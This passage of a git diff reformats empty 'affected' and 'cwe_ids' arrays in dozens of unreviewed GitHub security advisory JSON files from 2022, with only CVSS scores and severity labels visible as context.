b/advisories/unreviewed/2022/05/GHSA-gpqh-6jq2-jrg3/GHSA-gpqh-6jq2-jrg3.json index 44ae8d4b4a2..7bcfc7247c6 100644 --- a/advisories/unreviewed/2022/05/GHSA-gpqh-6jq2-jrg3/GHSA-gpqh-6jq2-jrg3.json +++ b/advisories/unreviewed/2022/05/GHSA-gpqh-6jq2-jrg3/GHSA-gpqh-6jq2-jrg3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gqmm-8677-r446/GHSA-gqmm-8677-r446.json b/advisories/unreviewed/2022/05/GHSA-gqmm-8677-r446/GHSA-gqmm-8677-r446.json index a66c0465fdb..086e9471547 100644 --- a/advisories/unreviewed/2022/05/GHSA-gqmm-8677-r446/GHSA-gqmm-8677-r446.json +++ b/advisories/unreviewed/2022/05/GHSA-gqmm-8677-r446/GHSA-gqmm-8677-r446.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gr3r-235r-p35c/GHSA-gr3r-235r-p35c.json b/advisories/unreviewed/2022/05/GHSA-gr3r-235r-p35c/GHSA-gr3r-235r-p35c.json index 7dd60fad730..420e455ae23 100644 --- a/advisories/unreviewed/2022/05/GHSA-gr3r-235r-p35c/GHSA-gr3r-235r-p35c.json +++ b/advisories/unreviewed/2022/05/GHSA-gr3r-235r-p35c/GHSA-gr3r-235r-p35c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gv38-5q2v-rvgw/GHSA-gv38-5q2v-rvgw.json b/advisories/unreviewed/2022/05/GHSA-gv38-5q2v-rvgw/GHSA-gv38-5q2v-rvgw.json index 3c04a7515cd..493ac13d3ec 100644 --- a/advisories/unreviewed/2022/05/GHSA-gv38-5q2v-rvgw/GHSA-gv38-5q2v-rvgw.json +++ b/advisories/unreviewed/2022/05/GHSA-gv38-5q2v-rvgw/GHSA-gv38-5q2v-rvgw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gvm2-5f2f-5j2m/GHSA-gvm2-5f2f-5j2m.json b/advisories/unreviewed/2022/05/GHSA-gvm2-5f2f-5j2m/GHSA-gvm2-5f2f-5j2m.json index d8b46c1492f..8233d881237 100644 --- a/advisories/unreviewed/2022/05/GHSA-gvm2-5f2f-5j2m/GHSA-gvm2-5f2f-5j2m.json +++ b/advisories/unreviewed/2022/05/GHSA-gvm2-5f2f-5j2m/GHSA-gvm2-5f2f-5j2m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h3pr-3hpg-m443/GHSA-h3pr-3hpg-m443.json b/advisories/unreviewed/2022/05/GHSA-h3pr-3hpg-m443/GHSA-h3pr-3hpg-m443.json index d3b2068625a..56d85a05d77 100644 --- a/advisories/unreviewed/2022/05/GHSA-h3pr-3hpg-m443/GHSA-h3pr-3hpg-m443.json +++ b/advisories/unreviewed/2022/05/GHSA-h3pr-3hpg-m443/GHSA-h3pr-3hpg-m443.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h3px-gm67-h9vp/GHSA-h3px-gm67-h9vp.json b/advisories/unreviewed/2022/05/GHSA-h3px-gm67-h9vp/GHSA-h3px-gm67-h9vp.json index d6c256ac3e5..f9947c9c7f5 100644 --- a/advisories/unreviewed/2022/05/GHSA-h3px-gm67-h9vp/GHSA-h3px-gm67-h9vp.json +++ b/advisories/unreviewed/2022/05/GHSA-h3px-gm67-h9vp/GHSA-h3px-gm67-h9vp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h454-qvp2-4mpp/GHSA-h454-qvp2-4mpp.json b/advisories/unreviewed/2022/05/GHSA-h454-qvp2-4mpp/GHSA-h454-qvp2-4mpp.json index ca6249a515b..0f8399c7a9c 100644 --- a/advisories/unreviewed/2022/05/GHSA-h454-qvp2-4mpp/GHSA-h454-qvp2-4mpp.json +++ b/advisories/unreviewed/2022/05/GHSA-h454-qvp2-4mpp/GHSA-h454-qvp2-4mpp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h574-pqf7-gvpf/GHSA-h574-pqf7-gvpf.json b/advisories/unreviewed/2022/05/GHSA-h574-pqf7-gvpf/GHSA-h574-pqf7-gvpf.json index e13ed558239..4cb655c46d7 100644 --- a/advisories/unreviewed/2022/05/GHSA-h574-pqf7-gvpf/GHSA-h574-pqf7-gvpf.json +++ b/advisories/unreviewed/2022/05/GHSA-h574-pqf7-gvpf/GHSA-h574-pqf7-gvpf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h5g6-4mhq-jc8h/GHSA-h5g6-4mhq-jc8h.json b/advisories/unreviewed/2022/05/GHSA-h5g6-4mhq-jc8h/GHSA-h5g6-4mhq-jc8h.json index 76841a7c0c2..550cd5e09f9 100644 --- a/advisories/unreviewed/2022/05/GHSA-h5g6-4mhq-jc8h/GHSA-h5g6-4mhq-jc8h.json +++ b/advisories/unreviewed/2022/05/GHSA-h5g6-4mhq-jc8h/GHSA-h5g6-4mhq-jc8h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h666-g8cv-q5jv/GHSA-h666-g8cv-q5jv.json b/advisories/unreviewed/2022/05/GHSA-h666-g8cv-q5jv/GHSA-h666-g8cv-q5jv.json index 4dc3a251c78..8e92872ba8f 100644 --- a/advisories/unreviewed/2022/05/GHSA-h666-g8cv-q5jv/GHSA-h666-g8cv-q5jv.json +++ b/advisories/unreviewed/2022/05/GHSA-h666-g8cv-q5jv/GHSA-h666-g8cv-q5jv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h6qg-qc5q-j77p/GHSA-h6qg-qc5q-j77p.json b/advisories/unreviewed/2022/05/GHSA-h6qg-qc5q-j77p/GHSA-h6qg-qc5q-j77p.json index 51b0bc76dc3..6c09afef2bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-h6qg-qc5q-j77p/GHSA-h6qg-qc5q-j77p.json +++ b/advisories/unreviewed/2022/05/GHSA-h6qg-qc5q-j77p/GHSA-h6qg-qc5q-j77p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h744-qjx7-h46q/GHSA-h744-qjx7-h46q.json b/advisories/unreviewed/2022/05/GHSA-h744-qjx7-h46q/GHSA-h744-qjx7-h46q.json index c8aa10cdfa1..df0c21a8b4e 100644 --- a/advisories/unreviewed/2022/05/GHSA-h744-qjx7-h46q/GHSA-h744-qjx7-h46q.json +++ b/advisories/unreviewed/2022/05/GHSA-h744-qjx7-h46q/GHSA-h744-qjx7-h46q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h8w2-9w2w-gm8f/GHSA-h8w2-9w2w-gm8f.json b/advisories/unreviewed/2022/05/GHSA-h8w2-9w2w-gm8f/GHSA-h8w2-9w2w-gm8f.json index b66f97ee05b..1887c4638e1 100644 --- a/advisories/unreviewed/2022/05/GHSA-h8w2-9w2w-gm8f/GHSA-h8w2-9w2w-gm8f.json +++ b/advisories/unreviewed/2022/05/GHSA-h8w2-9w2w-gm8f/GHSA-h8w2-9w2w-gm8f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h98g-h25m-2vvx/GHSA-h98g-h25m-2vvx.json b/advisories/unreviewed/2022/05/GHSA-h98g-h25m-2vvx/GHSA-h98g-h25m-2vvx.json index e4d39cacfdb..a4fd8af044e 100644 --- a/advisories/unreviewed/2022/05/GHSA-h98g-h25m-2vvx/GHSA-h98g-h25m-2vvx.json +++ b/advisories/unreviewed/2022/05/GHSA-h98g-h25m-2vvx/GHSA-h98g-h25m-2vvx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h9gc-h675-whm8/GHSA-h9gc-h675-whm8.json b/advisories/unreviewed/2022/05/GHSA-h9gc-h675-whm8/GHSA-h9gc-h675-whm8.json index 10820846578..cdaaea2ecee 100644 --- a/advisories/unreviewed/2022/05/GHSA-h9gc-h675-whm8/GHSA-h9gc-h675-whm8.json +++ b/advisories/unreviewed/2022/05/GHSA-h9gc-h675-whm8/GHSA-h9gc-h675-whm8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h9j3-9qh7-j5xq/GHSA-h9j3-9qh7-j5xq.json b/advisories/unreviewed/2022/05/GHSA-h9j3-9qh7-j5xq/GHSA-h9j3-9qh7-j5xq.json index e843ee657e5..0e0adcc1438 100644 --- a/advisories/unreviewed/2022/05/GHSA-h9j3-9qh7-j5xq/GHSA-h9j3-9qh7-j5xq.json +++ b/advisories/unreviewed/2022/05/GHSA-h9j3-9qh7-j5xq/GHSA-h9j3-9qh7-j5xq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h9qc-9g3f-gh5r/GHSA-h9qc-9g3f-gh5r.json b/advisories/unreviewed/2022/05/GHSA-h9qc-9g3f-gh5r/GHSA-h9qc-9g3f-gh5r.json index be36c18d8c1..843510dbbab 100644 --- a/advisories/unreviewed/2022/05/GHSA-h9qc-9g3f-gh5r/GHSA-h9qc-9g3f-gh5r.json +++ b/advisories/unreviewed/2022/05/GHSA-h9qc-9g3f-gh5r/GHSA-h9qc-9g3f-gh5r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hc47-w9jf-cv4v/GHSA-hc47-w9jf-cv4v.json b/advisories/unreviewed/2022/05/GHSA-hc47-w9jf-cv4v/GHSA-hc47-w9jf-cv4v.json index 7d283636230..4e7b568f30f 100644 --- a/advisories/unreviewed/2022/05/GHSA-hc47-w9jf-cv4v/GHSA-hc47-w9jf-cv4v.json +++ b/advisories/unreviewed/2022/05/GHSA-hc47-w9jf-cv4v/GHSA-hc47-w9jf-cv4v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hf38-2r76-5mj2/GHSA-hf38-2r76-5mj2.json b/advisories/unreviewed/2022/05/GHSA-hf38-2r76-5mj2/GHSA-hf38-2r76-5mj2.json index 3ac8c3e3551..c935ecef8a0 100644 --- a/advisories/unreviewed/2022/05/GHSA-hf38-2r76-5mj2/GHSA-hf38-2r76-5mj2.json +++ b/advisories/unreviewed/2022/05/GHSA-hf38-2r76-5mj2/GHSA-hf38-2r76-5mj2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hf42-4hj4-cx44/GHSA-hf42-4hj4-cx44.json b/advisories/unreviewed/2022/05/GHSA-hf42-4hj4-cx44/GHSA-hf42-4hj4-cx44.json index b34cb699dd9..e6276ae9f42 100644 --- a/advisories/unreviewed/2022/05/GHSA-hf42-4hj4-cx44/GHSA-hf42-4hj4-cx44.json +++ b/advisories/unreviewed/2022/05/GHSA-hf42-4hj4-cx44/GHSA-hf42-4hj4-cx44.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hg5j-c849-7q67/GHSA-hg5j-c849-7q67.json b/advisories/unreviewed/2022/05/GHSA-hg5j-c849-7q67/GHSA-hg5j-c849-7q67.json index f1057392ad1..73d5beb42c5 100644 --- a/advisories/unreviewed/2022/05/GHSA-hg5j-c849-7q67/GHSA-hg5j-c849-7q67.json +++ b/advisories/unreviewed/2022/05/GHSA-hg5j-c849-7q67/GHSA-hg5j-c849-7q67.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -71,9 +69,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hh8q-mmrv-6fcp/GHSA-hh8q-mmrv-6fcp.json b/advisories/unreviewed/2022/05/GHSA-hh8q-mmrv-6fcp/GHSA-hh8q-mmrv-6fcp.json index f433eed69b0..02c28d9861a 100644 --- a/advisories/unreviewed/2022/05/GHSA-hh8q-mmrv-6fcp/GHSA-hh8q-mmrv-6fcp.json +++ b/advisories/unreviewed/2022/05/GHSA-hh8q-mmrv-6fcp/GHSA-hh8q-mmrv-6fcp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hhgx-vhvj-3p39/GHSA-hhgx-vhvj-3p39.json b/advisories/unreviewed/2022/05/GHSA-hhgx-vhvj-3p39/GHSA-hhgx-vhvj-3p39.json index e1312885d5e..52c1017d003 100644 --- a/advisories/unreviewed/2022/05/GHSA-hhgx-vhvj-3p39/GHSA-hhgx-vhvj-3p39.json +++ b/advisories/unreviewed/2022/05/GHSA-hhgx-vhvj-3p39/GHSA-hhgx-vhvj-3p39.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hhr5-hrp3-x4cg/GHSA-hhr5-hrp3-x4cg.json b/advisories/unreviewed/2022/05/GHSA-hhr5-hrp3-x4cg/GHSA-hhr5-hrp3-x4cg.json index 67d7fba5d4c..77daf6bf8ac 100644 --- a/advisories/unreviewed/2022/05/GHSA-hhr5-hrp3-x4cg/GHSA-hhr5-hrp3-x4cg.json +++ b/advisories/unreviewed/2022/05/GHSA-hhr5-hrp3-x4cg/GHSA-hhr5-hrp3-x4cg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hmvp-993j-38fx/GHSA-hmvp-993j-38fx.json b/advisories/unreviewed/2022/05/GHSA-hmvp-993j-38fx/GHSA-hmvp-993j-38fx.json index 164d106a78d..20c33a61e19 100644 --- a/advisories/unreviewed/2022/05/GHSA-hmvp-993j-38fx/GHSA-hmvp-993j-38fx.json +++ b/advisories/unreviewed/2022/05/GHSA-hmvp-993j-38fx/GHSA-hmvp-993j-38fx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hphv-vwxm-56c8/GHSA-hphv-vwxm-56c8.json b/advisories/unreviewed/2022/05/GHSA-hphv-vwxm-56c8/GHSA-hphv-vwxm-56c8.json index 46e6ce09912..4186b5f4039 100644 --- a/advisories/unreviewed/2022/05/GHSA-hphv-vwxm-56c8/GHSA-hphv-vwxm-56c8.json +++ b/advisories/unreviewed/2022/05/GHSA-hphv-vwxm-56c8/GHSA-hphv-vwxm-56c8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hr84-34hc-rh37/GHSA-hr84-34hc-rh37.json b/advisories/unreviewed/2022/05/GHSA-hr84-34hc-rh37/GHSA-hr84-34hc-rh37.json index f27dd22c253..c314bf93682 100644 --- a/advisories/unreviewed/2022/05/GHSA-hr84-34hc-rh37/GHSA-hr84-34hc-rh37.json +++ b/advisories/unreviewed/2022/05/GHSA-hr84-34hc-rh37/GHSA-hr84-34hc-rh37.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hr92-3qpp-wqch/GHSA-hr92-3qpp-wqch.json b/advisories/unreviewed/2022/05/GHSA-hr92-3qpp-wqch/GHSA-hr92-3qpp-wqch.json index 928094bb1c3..aa36d8b1214 100644 --- a/advisories/unreviewed/2022/05/GHSA-hr92-3qpp-wqch/GHSA-hr92-3qpp-wqch.json +++ b/advisories/unreviewed/2022/05/GHSA-hr92-3qpp-wqch/GHSA-hr92-3qpp-wqch.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hrhp-2gw6-7jfr/GHSA-hrhp-2gw6-7jfr.json b/advisories/unreviewed/2022/05/GHSA-hrhp-2gw6-7jfr/GHSA-hrhp-2gw6-7jfr.json index cd77bb57089..a34963b8d16 100644 --- a/advisories/unreviewed/2022/05/GHSA-hrhp-2gw6-7jfr/GHSA-hrhp-2gw6-7jfr.json +++ b/advisories/unreviewed/2022/05/GHSA-hrhp-2gw6-7jfr/GHSA-hrhp-2gw6-7jfr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hrpf-w86j-42rg/GHSA-hrpf-w86j-42rg.json b/advisories/unreviewed/2022/05/GHSA-hrpf-w86j-42rg/GHSA-hrpf-w86j-42rg.json index 761c36c1ba4..c1f52e291f7 100644 --- a/advisories/unreviewed/2022/05/GHSA-hrpf-w86j-42rg/GHSA-hrpf-w86j-42rg.json +++ b/advisories/unreviewed/2022/05/GHSA-hrpf-w86j-42rg/GHSA-hrpf-w86j-42rg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hvw4-3p5v-phxc/GHSA-hvw4-3p5v-phxc.json b/advisories/unreviewed/2022/05/GHSA-hvw4-3p5v-phxc/GHSA-hvw4-3p5v-phxc.json index 7b04bd55d4b..f8b137c6716 100644 --- a/advisories/unreviewed/2022/05/GHSA-hvw4-3p5v-phxc/GHSA-hvw4-3p5v-phxc.json +++ b/advisories/unreviewed/2022/05/GHSA-hvw4-3p5v-phxc/GHSA-hvw4-3p5v-phxc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hxgx-wfcx-qv3g/GHSA-hxgx-wfcx-qv3g.json b/advisories/unreviewed/2022/05/GHSA-hxgx-wfcx-qv3g/GHSA-hxgx-wfcx-qv3g.json index c591463ad89..9cca154dc6b 100644 --- a/advisories/unreviewed/2022/05/GHSA-hxgx-wfcx-qv3g/GHSA-hxgx-wfcx-qv3g.json +++ b/advisories/unreviewed/2022/05/GHSA-hxgx-wfcx-qv3g/GHSA-hxgx-wfcx-qv3g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j2g9-xj29-72m9/GHSA-j2g9-xj29-72m9.json b/advisories/unreviewed/2022/05/GHSA-j2g9-xj29-72m9/GHSA-j2g9-xj29-72m9.json index b25761196ac..49ac2e1d88b 100644 --- a/advisories/unreviewed/2022/05/GHSA-j2g9-xj29-72m9/GHSA-j2g9-xj29-72m9.json +++ b/advisories/unreviewed/2022/05/GHSA-j2g9-xj29-72m9/GHSA-j2g9-xj29-72m9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j2gr-q67w-xgf5/GHSA-j2gr-q67w-xgf5.json b/advisories/unreviewed/2022/05/GHSA-j2gr-q67w-xgf5/GHSA-j2gr-q67w-xgf5.json index 9370489b81a..2e99d88e0dc 100644 --- a/advisories/unreviewed/2022/05/GHSA-j2gr-q67w-xgf5/GHSA-j2gr-q67w-xgf5.json +++ b/advisories/unreviewed/2022/05/GHSA-j2gr-q67w-xgf5/GHSA-j2gr-q67w-xgf5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j3p8-f8qh-x2cf/GHSA-j3p8-f8qh-x2cf.json b/advisories/unreviewed/2022/05/GHSA-j3p8-f8qh-x2cf/GHSA-j3p8-f8qh-x2cf.json index c74e65fec3f..64125e0be3d 100644 --- a/advisories/unreviewed/2022/05/GHSA-j3p8-f8qh-x2cf/GHSA-j3p8-f8qh-x2cf.json +++ b/advisories/unreviewed/2022/05/GHSA-j3p8-f8qh-x2cf/GHSA-j3p8-f8qh-x2cf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": 